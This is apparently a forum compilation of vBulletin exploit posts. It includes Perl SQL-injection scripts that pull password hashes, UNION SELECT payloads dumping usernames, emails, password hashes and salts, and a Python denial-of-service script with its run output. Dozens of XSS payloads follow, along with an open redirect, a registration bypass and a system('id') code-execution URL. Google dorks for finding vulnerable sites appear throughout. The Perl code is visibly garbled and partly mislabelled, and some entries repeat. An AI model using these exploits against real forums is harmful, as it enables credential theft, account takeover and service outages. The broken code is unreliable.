Multiple Open Redirect vulnerabilities in vBulletin version 4.1.3 and below allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the "url" parameter. By appending ?url=http://attackersite.com any number of pages, the user will be redirected to a potentially dangerous site. This is particularly interesting when used on the registration form or the password reset form. 
 
Exploit Example:
http://forum.pwndshop.com/register.php?do=checkdate&amp;url=http://attackersite.com
 
Vendor Notified: Yes
 
Reference: 
http://www.vbulletin.com/forum/showthread.php/381014-Potential-Phishing-Vector?p=2166441
https://www.owasp.org/index.php/Open_redirect
 
Credit:
 
Robert Gilbert
Senior Consultant
HALOCK Security Labs, Purpose Driven Security(tm)
rgilbert [-at-] halock [-dot-] com 
http://www.halock.com 
http://blog.halock.com 
 
 
Note: This message (including any attachments) is intended only for the use of the individual or entity to which it is addressed and may contain information that is non-public, proprietary, privileged, and/or confidential. If you are not the intended recipient, you are hereby notified that any use, dissemination, distribution, or copying of this communication is strictly prohibited. If you have received this communication in error, please notify us immediately by telephone and delete this message immediately.
vBulletin versions 3 through 4.1.3 suffer from an open redirect vulnerability.

jos_ali_joe/vBulletin 3.6.1 SQL Injection 

Código Perl:
========================================================= vBulletin 3.6.1 Remote SQL Injection Exploit =========================================================

[+]
Title        vBulletin 3.6.1 Remote SQL Injection Exploit [+]Author       jos_ali_joe [+]Contact      josalijoe@yahoo.com [+]Home   http://josalijoe.wordpress.com/  


##########################################################

#!/usr/bin/perl
  
use IO::Socket;

print 
q######################################################
# DeluxeBB Remote SQL Injection Exploit #
# vbulletin Remote SQL Injection Exploit #
###################################################### 
};

if (!
$ARGV[2]) {

print 
qUsageperl dbbxpl.pl host /directoryvictim_userid

perl dbbxpl
.pl www.nekisite.com /forum1
  
};

}
  
$server $ARGV[0]; $dir $ARGV[1]; $user $ARGV[2]; $myuser $ARGV[3]; $mypass $ARGV[4]; $myid $ARGV[5];

print 
"------------------------------------------------------------------------------------------------\r\n";
print 
"[>] SERVER: $server\r\n";
print 
"[>] DIR: $dir\r\n";
print 
"[>] USERID: $user\r\n";
print 
"------------------------------------------------------------------------------------------------\r\n\r\n";
  
$server =~ s/(http://)//eg;
  
$path $dir$path .= "misc.php?sub=profile&amp;name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;

print 
"[~] PREPARE TO CONNECT...\r\n";
  
$socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server"PeerPort => "80") || die "[-] CONNECTION FAILED";

print 
"[+] CONNECTED\r\n";
print 
"[~] SENDING QUERY...\r\n";
print 
$socket "GET $path HTTP/1.1\r\n";
print 
$socket "Host: $server\r\n";
print 
$socket "Accept: */*\r\n";
print 
$socket "Connection: close\r\n\r\n";
print 
"[+] DONE!\r\n\r\n";

print 
"--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while (
$answer = <$socket>)
{

if (
$answer =~/(w{32})/)
{

if ($
1 ne 0) {
print 
"Password Hash is: ".$1."\r\n";
print 
"--------------------------------------------------------------------------------------\r\n";

}
exit();
}

}
print 
"------------------------------------------------------------------------------------------------\r\n";
  
########################################################################
  
Thanx :

./
Me Family ATeN4 :

./
N4ck0 Aury TeRRenJr

Greets 
For :

./
Devilzc0de crew &#150; Kebumen Cyber – Explore Crew – Indonesian Hacker
  
My Team : ./Indonesian Coder  
vBulletin version 3.6.1 suffers from a remote SQL injection vulnerability.

The-0utl4w/vBulletin 3.8.2 Cross Site Scripting 


Código:
vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura &amp; all Aria-Security Mods &amp; Members
 
These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.
 
1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
or any other XSS code.
 
2.Post Icons. admincp/image.php?do=add&amp;table=icon add new title.. give a wrong path such as /images/aria.gif.  use the following code as title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
 
3.Post new Smilies. image.php?do=add&amp;table=smilie ... SAME AS #2.  use the following code as title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
 
4.New avatar. admincp/image.php?do=add&amp;table=avatar Same as #2. dont forget the update. use the following code as title name.
 
<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')</script>
 
 
 
The-0utl4w
http://Aria-Security.com
/* the-0utl4w.com
vBulletin version 3.8.2 suffers from persistent cross site scripting vulnerabilities.

Andhra Hackers/vBulletin Cyb - Advanced Forum Statistics Denial Of Service 

Código:
# Exploit Title: vBulletin "Cyb - Advanced Forum Statistics" DOS
# Date: 10-4-2010
# Author: Andhra Hackers
# Software Link:
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Code :
 
 
PHP crashes existed from a long time back and there were several issues which were a reason for that.
1)PHP pack() function bug has been there for about a long time, were if PHP try to allocate more memory more than generally allocated to PHP function then the the request is terminated and PHP exits/Crashes, this might even send a huge load to the server.
 
2)PHP memory allocation is done via the php.ini file of PHP installation, So if we could make PHP try to load with more memmory than it could handle then we cold possibly crash php or even the server causing a huge CPU usage.
 
3)A vulnerability exist in vBulletin add-on  "Cyb - Advanced Forum Statistics" in the misc.php file show=latestposts&amp;vsacb_resnr=, were application loads all latest 'n' no of post
depending on (vsacb_resnr= n) value. As no of post "vsacb_resnr" is user specific,that means we could make vBulletin to load huge no of datas from DB causing it to run out of memory and crash PHP and huge load may crash hosted apache also and won't be able to recover easily.
 
Attached is exploit code which could easily crash a vBulletin which has got "Cyb - Advanced Forum Statistics" add-on installed.
Either You could Use the attached exploit code to DOS the server or you could Simply move to the vulnerable page and
sent simultaneous request by refreshing the page.
 
 
An attacker could exploit this issue to crash the php installed and the crash might DOS the entire server for hours or attacker will be able to
download php files from the server.
 
A quick fix for this is to modify php.ini config file and increase the Php allocated memory to a higher value.
 
 
Exploit:
import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher       #"
print "#[+] Exploit found by Yash   [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu     [ICW] #"
print "#[+]     Indian Cyber Warriors     #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&amp;vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
   for i in range(1,int(kill)):
      print i
      res1 = urllib.urlopen(url).read(200)
      print res1
except(IOError),msg: print "Server will be FCUK'ed by now"
 
 
################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher       #
#[+] Bug found by Yash       [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu     [ICW] #
#[+]     Indian Cyber Warriors     #
####################################
 
Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere
 
[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Server will be FCUK'ed by now
 
 
#Yash (yash@andhrahackers.com<mailto:yash@andhrahackers.com>)
 
#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,d4rk-blu™,Mannu,Harin,Jappy,Dj Hoodlum Don,Sam,Circuit,cph4cker
#Shoutz: hg_H@x0r,r45c4l,41w@r10r,Hackuin
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in>
# Thnx to FB1H2S for Python Code :-)
vBulletin Cyb - Advanced Forum Statistics suffers from a denial of service vulnerability.

indoushka/vBulletin 4.0.2 Cross Site Scripting 

Código:
========================================================================================                  
| # Title    : vBulletin™ Version 4.0.2 Cross Site Scripting in URI Vulnerability      
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                   
| # Home     : www.iq-ty.com                                                                     
| # Web Site : http://www.digzip.com/files/54QE0JXS...ulledfinal.rar                                                     
| # Dork     : Powered by vBulletin™ Version 4.0.2                                                                                                              
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Lunix Français v.(9.4 Ubuntu)       
| # Bug      : XSS                                                                     
======================      Exploit By indoushka       =================================
# Exploit  :  
 
http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
 
http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
 
 
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * Xproratix ==========================================
Greetz : 
Exploit-db Team : 
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (Tinjah.com) * Yashar (sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
www.owned-m.com * Stake (v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com)
www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team)
www.hacker.ps * no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net 
www.alkrsan.net * www.kadmiwe.net * www.arhack.net   
--------------------------------------------------------------------------------------------------------------
vBulletin version 4.0.2 suffers from a cross site scripting vulnerability.

indoushka/vBulletin 4.0.1 SQL Injection 

Código Perl:
#!/usr/bin/perl
  
use IO::Socket;


print 
q{  #######################################################################
#    vBulletin™ Version 4.0.1 Remote SQL Injection Exploit            #
#                      By indoushka                                   #
#                     [url]www.iq-ty.com/vb[/url]                                #
#               Souk Naamane  (00213771818860)                        #
#           Algeria Hackerz (indoushka@hotmail.com)                   #
#          Dork: Powered by vBulletin™ Version 4.0.1                  #         
#######################################################################  
};

if (!
$ARGV[2]) {

print 
q{
  
Usageperl  VB4.0.1.pl host /directoryvictim_userid

       perl  VB4.0.1
.pl [url]www.vb.com[/url] /forum1

  
};

}

  
$server $ARGV[0];  $dir    $ARGV[1];  $user   $ARGV[2];  $myuser $ARGV[3];  $mypass $ARGV[4];  $myid   $ARGV[5];

print 
"------------------------------------------------------------------------------------------------\r\n";
print 
"[>] SERVER: $server\r\n";
print 
"[>]    DIR: $dir\r\n";
print 
"[>] USERID: $user\r\n";
print 
"------------------------------------------------------------------------------------------------\r\n\r\n";
  
$server =~ s/(http://)//eg;
  
$path  $dir;  $path .= "misc.php?sub=profile&amp;name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%20WHERE%20(uid= '".$user ;


print 
"[~] PREPARE TO CONNECT...\r\n";
  
$socket IO::Socket::INET->newProto => "tcp"PeerAddr => "$server"PeerPort => "80") || die "[-] CONNECTION FAILED";

print 
"[+] CONNECTED\r\n";
print 
"[~] SENDING QUERY...\r\n";
print 
$socket "GET $path HTTP/1.1\r\n";
print 
$socket "Host: $server\r\n";
print 
$socket "Accept: */*\r\n";
print 
$socket "Connection: close\r\n\r\n";
print 
"[+] DONE!\r\n\r\n";



print 
"--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while (
$answer = <$socket>)
{

 if (
$answer =~/(w{32})/)
{

  if ($
1 ne 0) {
   print 
"Password is: ".$1."\r\n";
print 
"--------------------------------------------------------------------------------------\r\n";

      }
exit();
}

}
print 
"------------------------------------------------------------------------------------------------\r\n";

================================   
Dz-Ghost Team   ======================================================== Greetz ÔßÑÇ áÓßÇä æáÇíÉ ÓíÏí ÈáÚÈÇÓ 22 äÇÓ ãÚÓßÑ äÇÓ ÊíÇÑÊ äÇÓ ÇáÌáÝÉ äÇÓ ÇáãÓíáÉ äÇÓ ÊáãÓÇä äÇÓ äÏÑæãÉ +äÇÓ ãÛäíÉ äÇÓ æÌÏÉ +äÇÓ ÃÛÇÏíÑ äÇÓ ÝÇÓ æãßäÇÓ äÇÓ æåÑÇä
Exploit
-db Team (loneferret+Exploits+dookie2000caall my friend Dos-Dz Snakespc His0k4 Hussin-Str0ke Saoucha Star08 * [url]www.hackteach.org[/urlRafik (Tinjah.com) * Yashar (sc0rpion.ir) * Silitoad redda mourad (dgsn.dz) * [url]www.cyber-mirror.org[/url]
[
url]www.forums.ibb7.com[/url] * [url]www.owned-m.com[/url] *Stake (v4-team.com) * [url]www.dev-chat.com[/url]  * Cyb3r IntRue (avengers team)
* [
url]www.securityreason.com[/url] * [url]www.packetstormsecurity.org[/url] * [url]www.best-sec.net[/url] * [url]www.zone-h.net[/url] * [url]www.m-y.cc[/url]
* [
url]www.hacker.ps[/url] * no-exploit.com * [url]www.bug-blog.de[/url] * [url]www.bawassil.com[/url] * [url]www.host4ll.com[/url] * [url]www.xp10.me[/url]
[
url]www.forums.soqor.net[/url] * [url]www.alkrsan.net[/url] * blackc0der ([url]www.forum.aria-security.com[/url]) * [url]www.kadmiwe.net[/url]SoldierOfAllah ([url]www.m4r0c-s3curity.cc[/url]) * [url]www.arhack.net[/url] * [url]www.google.com[/url] * [url]www.sec-eviles.com[/url]
[
url]www.mriraq.com[/url] * [url]www.dzh4cker.l9l.org[/url] * [url]www.goyelang.cn[/url] * [url]www.arabic-m.com[/url] * [url]www.securitywall.org[/urlr1z ([url]www.sec-r1z.com[/url]) * [url]www.zac003.persiangig.ir[/url] * [url]www.0xblackhat.ir[/url] * [url]www.mormoroth.net[/url]
------------------------------------------------------------------------------------------------------------  
vBulletin version 4.0.1 remote SQL injection exploit.

W4n73d/vBulletin 4.0.1 Cross Site Scripting 

Código:
[+] Script: vBulletin™ Version 4.0.1
[+] Vendor: www.vbulletin.com
[+] Author: W4n73d
[+] Mail: w3hrm4cht@gmail.com
 
[~] Bug: Cross Site Scripting (XSS)
[~] Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS
!");</script>
[~] Demo: http://www.overbr.com.br/forum/calendar.php="<script>alert("! XSS
!");</script>
 
[+] Date: 12/02/2010
vBulletin version 4.0.1 appears to suffer from a cross site scripting vulnerability in calendar.php.

FB1H2S/vBulletin 4.1.3 SQL Injection 

Código:
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S  
# Software Link: [http://www.vbulletin.com/]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [http://members.vbulletin.com/]
 
######################################################################################################
Vulnerability:
######################################################################################################
 
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&amp;messagegroupid" due to improper input validation.
 
#####################################################################################################
Vulnerable Code:
#####################################################################################################
 
File:    /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
 
 
 
 
    if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
 
    {
 
      $value = $registry->GPC['messagegroupid'];
 
      if (!is_array($value))
 
      {
 
        $value = array($value);
 
      }
 
 
 
      if (!(in_array(' ',$value) OR in_array('',$value)))
 
      {
 
        if ($rst = $vbulletin->db->query_read("
 
          SELECT socialgroup.name
 
          FROM " . TABLE_PREFIX."socialgroup AS socialgroup
 
--->          WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
 
 
      }
 
 
 
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
        --> Search Single Content Type
 
Keywords :   Valid Group Message
 
Search Type : Group Messages 
 
Search in Group : Valid Group Id
 
&amp;messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showth...rability-0-day
 
 
###########################################################################################
Note:
###########################################################################################
 
Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".
vBulletin versions 4.0.x through 4.1.3 suffer from a remote SQL injection vulnerability in messagegroupid.

Ashiyane Digital Security Members/vBulletin adminCP Cross Site Scripting 

Código:
############################################################################
 
                .::vBulletin adminCP Cross-Site Scripting ::.
 
# Exploit Title: vBulletin adminCP Cross-Site Scripting
# Date: 2009
# Author: Ashiyane Digital Security Members (Cair3x)
# Software Link: http://www.vbulletin.com/
# Version: 3.8.4 and all Version
# Tested on: vBulletin 3.8.4
# CVE :
# Code :
 
 
                 -::Forum Manager => Add New Forum ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
               -::Calendar Manager => Add New Calendar ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
               -::Usergroup Manager => Add New Usergroup ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
                   -::User Rank Manager => Rank Type ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add )
 
use the following code as (OR you may enter text HTML is allowed) Text . 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
               -::BB Code Manager => Add New BB Code ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add )
 
Complete All Required Fields And Enter Javascript Code in Title : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
          -::Scheduled Task Manager => Add New Scheduled Task ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit )
 
Complete All Required Fields And Enter Javascript Code in Title : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
 
               -::FAQ Manager => Add New FAQ Item  ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
 
               -::Style Manager => Add New Style ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
All of the best
 
* Cair3x From Ashiyane Digital Security Members : (WwW.Ashiyane.org/forums/)
vBulletin adminCP version 3.8.4 suffers from a cross site scripting vulnerability.

d3v1l/vBulletin Radio And TV Player Cross Site Scripting 

Código:
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability 
 
About:- 
 
Radio and TV Add-on will add a radio and TV library to your forum.
 
Features:- 
 
- Users can add / delete / edit own stations
 
For more info about this plugin See - http://www.vbulletin.org/forum/showt...037&amp;page=2 
 
Note:-  
 
- To exploit this Bug need to be registred!and after you are registered you can add new radio station
  where name station can be "><script>alert(String.fromCharCode(88,83,83))</script>  
  and URL "><script>alert(String.fromCharCode(88,83,83))</script>
 
 
Poc: XSS 
 
http://www.musicadigitale.net/forum/...php?station=92 
 
Poc: Iframe 
 
http://www.musicadigitale.net/forum/...php?station=93 
 
Poc: Redirect 
 
http://www.musicadigitale.net/forum/...php?station=94
 
dorks:- inurl:radioandtv.php 
 
Bug founded by d3v1l [Avram Marius] 
 
Date: 14.06.2009 
 
https://security-shell.ws/forum.php 
http://security-sh3ll.blogspot.com
The vBulletin Radio and TV Player add-on suffers from cross site scripting, iframe injection, and redirect vulnerabilities.

D4rkB1t/vBulletin 4.1.2 SQL Injection

Código:
====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
 
#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : d4rkb1t@live.com
 
 
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 
&amp;cat[0]=1) UNION SELECT database()#
&amp;cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&amp;cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
More info: http://j0hnx3r.org/?p=818
 
--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
 
====================================================================
# 1337day.com [2011-5-21]
====================================================================
vBulletin versions 4.0.x through 4.1.2 suffer from a remote SQL injection vulnerability.

MaXe/vBulletin 4.0.8 - Persistent XSS via Profile Customization 

Código:
Title: vBulletin 4.0.8 - Persistent XSS via Profile Customization
 
 
Body:
vBulletin - Persistent Cross Site Scripting via Profile Customization
 
 
Versions Affected: 4.0.8 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more— vBulletin has it all.
Whether it’s available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability 
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, which is only visible to the attacker.
 
Proof of Concept:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)
 
[2] Global Reflected XSS:
An attacker can inject malicious CSS data executing javascript, which is then visible
to anyone browsing the user profile. Even guests visiting the malicious user profile.
 
Proof of Concept: (IE6 only, may not work in IE7+ and FF)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))
 
 
Please note that some of these strings may be too long to be injected. However a
blog entry at Exploit-DB and a video on YouTube will be released very soon.
 
 
-:: Solution ::-
Turn off profile customization immediately for users able to customize their profile!
When a security patch has been provided by the vendor, enable this feature again.
 
 
Disclosure Information:
- Vulnerability found and researched: 11th November 2010
- Vendor (vBulletin Solutions / IB) contacted: 11th November
- Disclosed to Exploit-DB, Bugtraq and InterN0T: 14th November
 
References:
http://forum.intern0t.net/intern0t-a...omization.html
http://www.vbulletin.com/forum/showt...zation-exploit
 Immortal Boy/vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability ( php)

Código:
===============================================================
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
===============================================================
 
 
   010101010101010101010101010101010101010101010101010101010   
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
  
 
# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010                            
# Author: Immortal Boy                     
# Software Link: http://www.vbulletin.org
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
  
#  BUG :  #########################################################################
  
1 > Go to Http://[localhost]/path/register.php
 
2 > Assume that forum admin user name is ADMIN
 
3 > Type this at User Name ===> ADMIN&#00
 
4 > &#00 is an ASCII Code
 
5 > And complete the other parameters
 
6 > Then click on Complete Registrarion
 
7 > Now you see that your user name like admin user name
  
After this time the private messages to the user (ADMIN) to sending see for you is sending .
 
 
#  Patch :  #######################################################################
 
1 > Go to AdminCP
 
2 > Click on vBulletin Options and choose vBulletin Options
 
3 > Choose Censorship Options
 
4 > type &# in Censored Words section
 
5 > Then click on Save
 
#############################################################################
 
Our Website : http://www.datacoders.ir
  
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,
 
hosinn , NIK , uones , mohammad_ir &  all iranian datacoders members
  
#############################################################################
FB1H2S/Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day ( php)

Código:
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S    
# Software Link: [http://www.vbulletin.com/]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [http://members.vbulletin.com/]
 
######################################################################################################
Vulnerability:
######################################################################################################
 
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
 
#####################################################################################################
Vulnerable Code:
#####################################################################################################
 
File:    /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
 
 
 
         
        if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
 
        {
 
            $value = $registry->GPC['messagegroupid'];
 
            if (!is_array($value))
 
            {
 
                $value = array($value);
 
            }
 
 
 
            if (!(in_array(' ',$value) OR in_array('',$value)))
 
            {
 
                if ($rst = $vbulletin->db->query_read("
 
                    SELECT socialgroup.name
 
                    FROM " . TABLE_PREFIX."socialgroup AS socialgroup
 
--->                 WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
 
                 
            }
 
 
 
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
          --> Search Single Content Type
 
Keywords :   Valid Group Message
 
Search Type : Group Messages 
 
Search in Group : Valid Group Id
 
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showth...rability-0-day
 
 
###########################################################################################
Note:
###########################################################################################
 
Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".
AL3NDALEEB/vBulletin <= 3.0.4 "forumdisplay.php" Code Execution ( php)

Código:
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
            showforumusers ON in vbulletin options.
 
2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.
 
3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
            visit the forums, it  must has at least one user show the forum.
 
4th condition     : magic_quotes_gpc must be OFF
 
